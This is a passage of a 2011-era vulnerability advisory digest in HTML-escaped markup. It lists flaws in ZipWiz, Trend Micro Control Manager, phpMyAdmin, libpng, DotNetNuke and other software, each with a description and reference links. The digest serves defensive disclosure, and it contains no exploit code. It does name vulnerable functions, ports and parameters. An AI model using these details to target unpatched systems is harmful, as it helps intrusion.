Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/archive/1/518740"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/archive/1/518740&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.6 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: ZipWiz 2005 ".zip" File Buffer Overflow&lt;br /&gt;
Description: ZipWiz 2005 is a file compression application. The&lt;br /&gt;
application is exposed to a buffer overflow issue because it fails to&lt;br /&gt;
perform adequate checks on user-supplied input. Specifically, this&lt;br /&gt;
issue occurs when processing a specially crafted ".zip" file. ZipWiz&lt;br /&gt;
2005 5.0 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48624/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48624/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.7 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Effective File Search (EFS) DLL Loading Arbitrary Code&lt;br /&gt;
Execution&lt;br /&gt;
Description: Effective File Search is a file search utility for&lt;br /&gt;
Microsoft Windows. The application is exposed to a security issue&lt;br /&gt;
because the application searches for the "ztvunrar36.dll" Dynamic Link&lt;br /&gt;
Library in the current working directory. The issue can be exploited by&lt;br /&gt;
placing both a specially crafted library file and a file that is&lt;br /&gt;
associated with the vulnerable application in an attacker controlled&lt;br /&gt;
location.&amp;nbsp; Using the application to open a ".efs" file will cause the&lt;br /&gt;
malicious library file to be executed. Effective File Search 6.7 is&lt;br /&gt;
vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48608/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48608/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.8 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: ZipItFree ".zip" File Buffer Overflow&lt;br /&gt;
Description: ZipItFree is a file compression application. The&lt;br /&gt;
application is exposed to a heap-based buffer overflow issue because&lt;br /&gt;
it fails to perform adequate checks on user-supplied input.&lt;br /&gt;
Specifically, this issue occurs when processing a specially crafted&lt;br /&gt;
".zip" file. ZipItFree 3.0 is vulnerable; other versions may also be&lt;br /&gt;
affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48629/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48629/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.9 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Trend Micro Control Manager "CASProcessor.exe" BLOB Remote Code&lt;br /&gt;
Execution&lt;br /&gt;
Description: Trend Micro Control Manager is a Web-based management&lt;br /&gt;
console. The application is exposed to a remote code execution issue.&lt;br /&gt;
The issue affects the "En_Utility.dll" file when communicating with&lt;br /&gt;
the "CASProcessor.exe" process through TCP port 20801. The issue&lt;br /&gt;
occurs in the "HandleMcpRequest()" function when parsing a specially&lt;br /&gt;
crafted packet with malformed BLOB encrypted data. Trend Micro Control&lt;br /&gt;
Manager 5.0 and 5.5 are vulnerable and other versions may also be&lt;br /&gt;
affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://esupport.trendmicro.com/solution/en-us/1058292.aspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://esupport.trendmicro.com/solution/en-us/1058292.aspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.10 CVE: Not Available&lt;br /&gt;
Platform: Linux&lt;br /&gt;
Title: Debian and Ubuntu foo2zjs Insecure Temporary File Creation&lt;br /&gt;
Vulnerability&lt;br /&gt;
Description: Foo2zjs is an open source printer driver for the ZjStream&lt;br /&gt;
protocol. Foo2zjs creates "/tmp/foo2zjs" in an insecure manner. An&lt;br /&gt;
attacker with local access could potentially exploit this issue to&lt;br /&gt;
perform symbolic-link attacks, overwriting arbitrary files in the&lt;br /&gt;
context of the affected application. Debian and Ubuntu are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48586/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48586/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.11 CVE: CVE-2011-2398&lt;br /&gt;
Platform: HP-UX&lt;br /&gt;
Title: HP-UX Dynamic Loader Unspecified Local Privilege Escalation&lt;br /&gt;
Description: HP-UX Dynamic Loader is a Unix-based operating system.&lt;br /&gt;
Dynamic Loader is exposed to an unspecified local privilege escalation&lt;br /&gt;
issue. HP-UX B.11.11, B.11.23, and B.11.31 are vulnerable and other&lt;br /&gt;
versions may also be affected.&lt;br /&gt;
Ref:&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02904002&amp;amp;ac.admitted=1310010561389.876444892.492883150"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02904002&amp;amp;ac.admitted=1310010561389.876444892.492883150&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.12 CVE: CVE-2011-2516&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Apache XML Security for C++ Signature Key Parsing Denial of&lt;br /&gt;
Service&lt;br /&gt;
Description: Apache XML Security for C++ is a library that implements&lt;br /&gt;
the primary security standards for XML. The library is exposed to a&lt;br /&gt;
denial of service issue. Specifically, the issue is caused by a&lt;br /&gt;
buffer overflow condition when creating or verifying XML signatures&lt;br /&gt;
with RSA keys of sizes in the order of 8192 bits or more. Attackers&lt;br /&gt;
can exploit this issue through overly long keys and cause the&lt;br /&gt;
application to deny service. Apache XML Security for C++ versions&lt;br /&gt;
prior to 1.6.1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://santuario.apache.org/secadv/CVE-2011-2516.txt"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://santuario.apache.org/secadv/CVE-2011-2516.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
_______________________________________________________ ________ _______&lt;br /&gt;
&lt;br /&gt;
11.29.13 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: libpng PNG File Denial of Service&lt;br /&gt;
Description: The "libpng" library is a PNG reference library. The&lt;br /&gt;
application is exposed to a remote denial of service issue because it&lt;br /&gt;
fails to properly handle a sCAL chunk. Specifically, the&lt;br /&gt;
issue occurs when processing specially crafted PNG files. libpng&lt;br /&gt;
versions 1.5.x before 1.5.4, 1.4.x before 1.4.8, 1.2.x before 1.2.45&lt;br /&gt;
and 1.0.x before 1.0.55 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.kb.cert.org/vuls/id/819894"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.kb.cert.org/vuls/id/819894&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.14 CVE: CVE-2011-2634&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Opera Web Browser Multiple Security Weaknesses&lt;br /&gt;
Description: Opera is a Web browser application. The application is&lt;br /&gt;
exposed to multiple security weaknesses that may allow unspecified&lt;br /&gt;
third party applications to hijack searches and customizations. Opera&lt;br /&gt;
versions prior to 11.10 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/windows/1110/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.opera.com/docs/changelogs/windows/1110/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/unix/1110/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.opera.com/docs/changelogs/unix/1110/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.opera.com/docs/changelogs/mac/1110/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.opera.com/docs/changelogs/mac/1110/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.15 CVE: CVE-2011-1224&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: IBM WebSphere MQ CDP Extension Revoked SSL Certificate&lt;br /&gt;
Validation Security Bypass Vulnerability&lt;br /&gt;
Description: IBM WebSphere MQ is a commercially available messaging&lt;br /&gt;
engine for enterprises. The application is exposed to a security&lt;br /&gt;
bypass issue that occurs because it fails to use the CRL Distribution&lt;br /&gt;
Points certificate extension which results in improper&lt;br /&gt;
validation of revoked SSL certificates. Versions prior to WebSphere MQ&lt;br /&gt;
6.0.2.11 and 7.0.1.5 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www-01.ibm.com/support/docview.wss?uid=swg27014224"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www-01.ibm.com/support/docview.wss?uid=swg27014224&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www-01.ibm.com/support/docview.wss?uid=swg27007069"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www-01.ibm.com/support/docview.wss?uid=swg27007069&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.16 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: libsndfile PAF File Integer Overflow&lt;br /&gt;
Description: The "libsndfile" library is used for reading and writing&lt;br /&gt;
audio files. The application is exposed to an integer overflow issue&lt;br /&gt;
because it fails to perform adequate boundary checks on user-supplied&lt;br /&gt;
data. Specifically, this issue occurs within the "paf24_init()"&lt;br /&gt;
function of the "src/paf.c" source file when parsing specially crafted&lt;br /&gt;
"PAF" (Paris Audio) files. libsndfile 1.0.24 is vulnerable and other&lt;br /&gt;
versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48644/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48644/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.17 CVE: CVE-2011-2198&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: libvte9 "vte_sequence_handler_multiple()" Function Remote&lt;br /&gt;
Denial of Service&lt;br /&gt;
Description: The VTE library provides a terminal emulator widget&lt;br /&gt;
(VteTerminal) for applications using the GTK+ toolkit. The library is&lt;br /&gt;
exposed to a remote denial of service issue. Specifically, the issue&lt;br /&gt;
occurs because the library fails to sanitize user-supplied input that&lt;br /&gt;
has been submitted to the "insert-blank-characters" capability&lt;br /&gt;
(defined in "caps.c"). The issue affects the&lt;br /&gt;
"vte_sequence_handler_multiple()" function of the "vteseq.c" source&lt;br /&gt;
file. libvte9 1:0.24.3-2 is vulnerable and other versions may also be&lt;br /&gt;
affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48645/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48645/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.18 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: SAP MaxDB NULL Pointer Dereference Denial of Service&lt;br /&gt;
Description: SAP MaxDB is a database application available for&lt;br /&gt;
multiple platforms. The application is exposed to a denial of service&lt;br /&gt;
issue. Specifically, the issue occurs due to a NULL pointer&lt;br /&gt;
dereference error in the "DBTech-MAXDB" service (kernel.exe) when&lt;br /&gt;
processing specially crafted login handshake packets. SAP MaxDB&lt;br /&gt;
7.8.01.18 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48646/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48646/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.19 CVE: CVE-2011-2508,CVE-2011-2507,CVE-2011-2506,CVE-2011-2505&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: phpMyAdmin Multiple Remote Vulnerabilities&lt;br /&gt;
Description: phpMyAdmin is a PHP-based Web application. The&lt;br /&gt;
application is exposed to multiple issues. An arbitrary PHP&lt;br /&gt;
code execution issue occurs due to an error in the "Swekey_login()"&lt;br /&gt;
function of the "libraries/auth/swekey/swekey.auth.lib.php" script.&lt;br /&gt;
An arbitrary PHP code execution issue occurs because the application&lt;br /&gt;
fails to properly sanitize user-supplied input passed to the&lt;br /&gt;
"PMA_createTargetTables()" function of the&lt;br /&gt;
"libraries/server_synchronize.lib.php" script. A local file include issue occurs&lt;br /&gt;
because the application fails to properly sanitize user-supplied input&lt;br /&gt;
passed to the "PMA_displayTableBody()" function of the&lt;br /&gt;
"libraries/display_tbl.lib.php" script. A PHP code injection is&lt;br /&gt;
possible in the setup scripts if the session variables are&lt;br /&gt;
overwritten. phpMyAdmin versions prior to 3.3.10.2 and 3.4.3.1 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.20 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: DotNetNuke Multiple Security Bypass Vulnerabilities&lt;br /&gt;
Description: DotNetNuke is an open source framework for creating and&lt;br /&gt;
deploying web sites. The application is exposed to multiple security&lt;br /&gt;
bypass issues. A security bypass issue occurs due to an error in the&lt;br /&gt;
"soft-delete" function. An attacker can exploit this issue to undelete&lt;br /&gt;
a user by re-registering with the same credentials. A security bypass&lt;br /&gt;
issue occurs due to an error when validating user permissions in certain&lt;br /&gt;
management functions. A security bypass issue occurs due to an error&lt;br /&gt;
when verifying uploaded files. A security bypass issue occurs due to an&lt;br /&gt;
error when granting edit permissions for a webpage or a module. Versions&lt;br /&gt;
prior to DotNetNuke 5.6.3 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48584/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48584/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.21 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: Ferdows CMS Cross-Site Scripting and Multiple SQL Injection&lt;br /&gt;
Vulnerabilities&lt;br /&gt;
Description: Ferdows CMS is a web-based application implemented in&lt;br /&gt;
ASP.NET. Ferdows CMS is exposed to multiple issues. A&lt;br /&gt;
cross-site scripting issue affects the "dataid" parameter of the&lt;br /&gt;
"showdata.aspx" script. The application is also exposed to Multiple&lt;br /&gt;
SQL injection issues. Ferdows CMS&lt;br /&gt;
Pro 1.1.0 and Ferdows CMS 9.0.5 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48640/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48640/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
